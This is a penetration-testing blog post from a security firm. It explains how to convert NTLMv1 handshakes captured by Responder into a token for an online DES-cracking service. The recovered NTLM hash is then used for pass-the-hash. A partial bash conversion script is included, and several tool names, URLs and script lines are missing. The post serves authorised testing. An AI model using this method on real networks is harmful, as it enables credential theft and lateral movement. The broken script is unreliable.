Cracking NTLMv1 Handshakes with

Read on if you’d like to learn how to crack NTLMv1 handshakes with the service to obtain the NTLM hash. Publicized since 2013, this technique is not often leveraged by testers.

Running is one of the first tasks performed by most pentesters on internal penetration tests. This tool will spoof Multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. Usually the next step is to attempt to crack those handshakes, at a minimum running them against a wordlist such as crackstation.

A NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. The NTLM hash can be used as a password equivalent in a windows environment, unlike the NTLMv1 handshake.

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56 bit DES (and a third round using only 2bytes of the keyspace), which Moxie Demonstrated could be cracked by modern FPGAS (

NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (

How do we exploit this?

Use the site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for $20. You need to convert it to a token, rather than display in Responder directly because the site doesn’t take the challenge/response.

Use the script below to convert the Responder output to a token that will be accepted by



if [ $# -lt 1 ]


    echo “Usage: <hash_file> <hash_file2> …”

    exit 1



for i in $@; do

for hash in $( cat $i )


    user=$(echo $hash | cut -f1 -d:)

    domain=$(echo $hash | cut -f3 -d:)

    lmresp=$(echo $hash | cut -f4 -d:)

    ntresp=$(echo $hash | cut -f5 -d:)

    srvchallenge=$(echo $hash | cut -f6 -d:)


    # Secret sauce:

    if [ ${lmresp:16:32} ==  “00000000000000000000000000000000” ]






        srvchallenge=$( echo $combinedchallenge | xxd -r -p| md5sum -b | cut -c1-16)




     echo “user:$user”

     echo “domain:$domain”

     echo “lmresponse:$lmresp”

     echo “ntresp:$ntresp”

     echo “challenge:$srvchallenge”


     chapcrack=$(locate | head -1)

     if [ -e “$chapcrack” ]


         $chapcrack radius -R $ntresp -C $srvchallenge


        echo “ radius -R $ntresp -C $srvchallenge”




Upload this token to, give them 20 dollars, and wait for your NTLM hash.

Another Hash?

Yes, NTLM hashes are password equivalents in a Windows environment. To leverage your newly acquired NTLM hash, use a tool like wmi-pth.


Speak to a Cyber Security Expert Today

  • This field is for validation purposes and should be left unchanged.


All recommendations and case studies presented by Tevora are for information purposes only and not intended to be for the purposes of providing information security advice. Any use of this information for other means is prohibited.